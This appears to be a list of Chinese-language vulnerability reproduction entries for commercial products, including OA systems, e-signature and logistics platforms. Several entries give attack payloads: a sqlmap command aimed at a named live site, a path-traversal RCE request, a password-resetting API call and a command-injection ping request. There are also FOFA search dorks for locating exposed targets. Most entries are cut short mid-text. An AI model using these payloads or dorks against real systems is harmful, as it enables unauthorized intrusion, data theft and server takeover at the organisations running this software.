Q17-1启业-云运维平台-PermissionAC 漏洞复现: payload: /user/register/init
R1-1瑞友天翼-应用虚拟化系统-SQL 漏洞描述: 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接
Q16-1Quicklancer–SQL fofa语法: “service_fragments/css/gig_detail.css” 漏洞复现: payload: python sqlmap.py -u "https://quicklancer.bylancer.com/listing?cat=6
Q15-1契约锁-电子签章平台-RCE 漏洞复现: payload: POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Ma
Q14-1群杰-印章物联网管理平台-PermissionAC 漏洞复现: payload: GET /api/token/updateRestUser?restname=rest&password={{password}}
Q13-1全息-AI网络运维平台-RCE fofa语法: fofa:“全息AI网络运维平台” 漏洞复现: payload: POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1 host:127.0.0.1 ping_cmd=8.8
Q11-1青岛东胜-东胜物流软件-SQL 漏洞描述: 东胜物流软件 GetProParentModuTreeList 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木
Q10-1青铜器-RDM研发管理平台-文件上传 漏洞描述: 青铜器RDM研发管理平台 upload 接口存在任意文件上传漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 网站图片: 网络测绘: fofa语法: FOFA:bod
Q9-1企语iFair-协同管理系统-任意文件读取 漏洞描述: 企语iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取服务器敏感信息,使系统处于极不安全状态。 影响版本: 企语iFair <= v23.8_ad0 网站图
Q8-2全程云-OA-SQL 漏洞描述: 全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能,超过100多个子模块。为企业内部提供高效、畅通的信息渠道,同时也能大力推动公司信息系统发展,提高企业的办公自动化程度和综合管理水平,加快企业信息的流通,提高企业
